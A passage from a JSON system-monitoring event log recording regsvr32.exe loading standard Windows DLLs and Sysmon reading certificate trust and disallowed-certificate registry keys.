131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\System32\\AcLayers.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - 